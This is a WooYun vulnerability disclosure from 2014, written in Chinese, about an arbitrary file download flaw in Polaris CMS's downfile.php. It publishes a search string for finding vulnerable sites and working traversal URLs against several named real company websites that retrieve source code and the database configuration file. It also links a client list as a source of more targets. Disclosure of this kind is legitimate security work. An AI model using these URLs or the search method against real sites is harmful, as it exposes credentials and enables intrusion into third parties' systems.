当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059438

漏洞标题:某企业建站系统cms任意文件下载漏洞(影响多个实例)

相关厂商:Polaris cms

漏洞作者: 梧桐雨

提交时间:2014-05-05 10:43

修复时间:2014-08-03 10:44

公开时间:2014-08-03 10:44

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任意文件下载

详细说明:

存在该漏洞的cms是 Polaris cms
google关键字:downfile.php?direct 就可以找到许多,有的找不到的 请看我下面提供的列表即可:)
主要是当开启了下载模块:即download.php。
对传入的参数没有进行很好的过滤。产生了任意文件下载。
来看看实例1
http://www.sigmarobot.com/
开启了下载模块之后我们访问如下链接:

http://www.sigmarobot.com/downfile.php?direct=../&file=downfile.php


文件源码妥妥的,躺在了 我们的文件夹中

1.jpg


呀。。这根本没有过滤啊!
通过对文件系统的首页下载分析。得到数据库配置文件:
utility.php
好咯,既然在根目录,我们直接就down回来看看
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php

2.jpg


一切都那么自然。。

漏洞证明:

好了,下面来一波:
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php

3.jpg


http://www.tan-star.com.tw/downfile.php?direct=../&file=utility.php

4.jpg


5.jpg


http://www.injection.com.tw/downfile.php?direct=../&file=utility.php
全部贴图有点累,就贴上面这些吧。
下面这些也是可以下载的哦:
www.chaowei.com.tw/downfile.php?direct=../&file=downfile.php
www.injection.com.tw/downfile.php?direct=../&file=downfile.php
www.webcontrol.com.tw/downfile.php?direct=../&file=downfile.php
http://www.sencar.com.tw/downfile.php?direct=../&file=downfile.php
http://www.avitaplas.com/downfile.php?direct=../&file=downfile.php
http://www.human-video.com/downfile.php?direct=../&file=downfile.php
不一一列举了。。。
这里有一个列表:
http://www.polaris.net.tw/tw/webdesign_list.html 得注意这个漏洞的条件只需要网站系统开启了下载模块 download.php即可了!
看了下,影响较多台湾小企业网站,大陆只是占少数。

修复方案:

对传入参数进行有效性验证。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论